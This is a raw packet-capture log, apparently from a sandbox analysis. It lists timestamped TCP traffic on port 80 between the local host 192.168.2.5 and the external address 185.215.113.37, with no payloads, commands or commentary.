Sep 27, 2024 04:14:14.554446936 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.554450035 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.554480076 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.554490089 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.554511070 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.554521084 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.554543018 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.554565907 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.554575920 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.554585934 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.554610014 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.554617882 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.554641008 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.554651022 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.554673910 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.554683924 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.554706097 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.554717064 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.554738998 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.554745913 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.554790974 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.583410978 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.583429098 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.583437920 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.583467960 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.583477974 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.583534002 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.583544970 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.583578110 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.583623886 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.583659887 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.583671093 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.583683014 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.583693981 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.583802938 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.583802938 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.583802938 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.583802938 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.583802938 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.583802938 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.584007978 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.584031105 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.584042072 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.584053040 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.584064007 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.584074020 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.584084988 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.584095955 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.584108114 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.584121943 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.584134102 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.584144115 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.584161997 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.584161997 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.584161997 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.584161997 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.584161997 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.584177017 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.584182024 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.584237099 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.584249020 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.584259987 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.584270000 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.584281921 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.584300995 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.584377050 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.584388971 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.584424019 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.584429979 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.584441900 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.584450960 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.584461927 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.584469080 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.584471941 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.584497929 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.584523916 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.584579945 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.584621906 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.584629059 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.584640980 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.584651947 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.584661961 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.584683895 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.584716082 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.644165039 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.644222021 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.644270897 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.644320011 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.644328117 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.644328117 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.644328117 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.644367933 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.644370079 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.644418955 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.644421101 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.644454002 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.644467115 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.644489050 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.644501925 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.644516945 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.644531012 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.644547939 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.644562960 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.644582033 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.644594908 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.644612074 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.644628048 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.644644022 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.644658089 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.644690990 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.644697905 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.644740105 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.644747019 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.644779921 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.644789934 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.644825935 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.644825935 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.644867897 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.644876003 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.644908905 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.644927979 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.644939899 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.644947052 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.644972086 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.644978046 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.645019054 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.645039082 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.645090103 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.645090103 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.645132065 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.645138025 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.645164967 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.645179033 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.645195961 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.645207882 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.645234108 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.645247936 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.645267010 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.645277977 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.645304918 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.645314932 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.645349026 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.645355940 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.645380974 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.645387888 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.645412922 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.645422935 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.645446062 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.645454884 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.645478010 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.645492077 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.645510912 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.645534992 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.645555973 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.645565033 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.645600080 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.645607948 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.645632982 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.645642042 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.645664930 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.645672083 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.645695925 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.645703077 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.645728111 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.645735025 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.645759106 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.645768881 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.645791054 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.645797968 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.645823002 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.645828962 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.645855904 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.645863056 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.645886898 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.645898104 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.645920038 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.645931005 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.645951033 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.645956993 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.645992041 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.646037102 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.646068096 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.646083117 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.646100044 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.646112919 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.646132946 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.646146059 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.646164894 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.646176100 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.646198034 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.646209955 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.646230936 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.646244049 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.646264076 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.646286964 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.646296978 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.646308899 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.646328926 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.646342039 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.646367073 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.646373987 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.646399975 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.646409988 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.646433115 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.646441936 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.646465063 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.646476984 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.646500111 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.646508932 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.646543980 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.646549940 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.646583080 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.646612883 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.646615028 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.646630049 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.646647930 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.646651030 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.646677971 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.646692991 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.646706104 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.646722078 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.646738052 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.646747112 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.646770954 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.646780968 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.646814108 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.646851063 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.646882057 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.646897078 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.646914005 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.646924019 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.646945953 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.646960020 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.646979094 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.646991968 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.647011042 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.647025108 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.647042990 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.647057056 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.647073030 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.647090912 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.647104979 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.647119999 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.647138119 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.647150993 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.647171021 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.647182941 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.647203922 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.647216082 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.647248983 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.675827026 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.675837040 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.675904036 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.675926924 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.675965071 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.675970078 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.675976038 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.676007032 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.676023960 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.676037073 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.676079035 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.676135063 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.676145077 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.676155090 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.676166058 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.676181078 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.676208019 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.676282883 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.676294088 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.676304102 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.676316023 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.676325083 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.676326990 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.676343918 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.676371098 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.676465988 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.676475048 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.676485062 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.676496029 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.676506996 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.676510096 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.676537037 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.676552057 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.676618099 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.676629066 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.676639080 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.676665068 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.676749945 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.676778078 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.676786900 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.676795959 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.676808119 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.676817894 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.676829100 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.676830053 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.676840067 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.676851034 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.676858902 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.676879883 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.676893950 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.677002907 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.677012920 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.677023888 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.677045107 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.677063942 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.677072048 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.677102089 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.677134991 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.677146912 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.677156925 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.677166939 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.677171946 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.677185059 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.677206993 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.736663103 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.736706018 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.736730099 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.736754894 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.736766100 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.736767054 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.736776114 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.736785889 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.736793041 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.736803055 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.736808062 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.736814022 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.736824036 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.736835003 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.736855030 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.736882925 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.736951113 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.736960888 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.736972094 CEST	80	49704	185.215.113.37	192.168.2.5
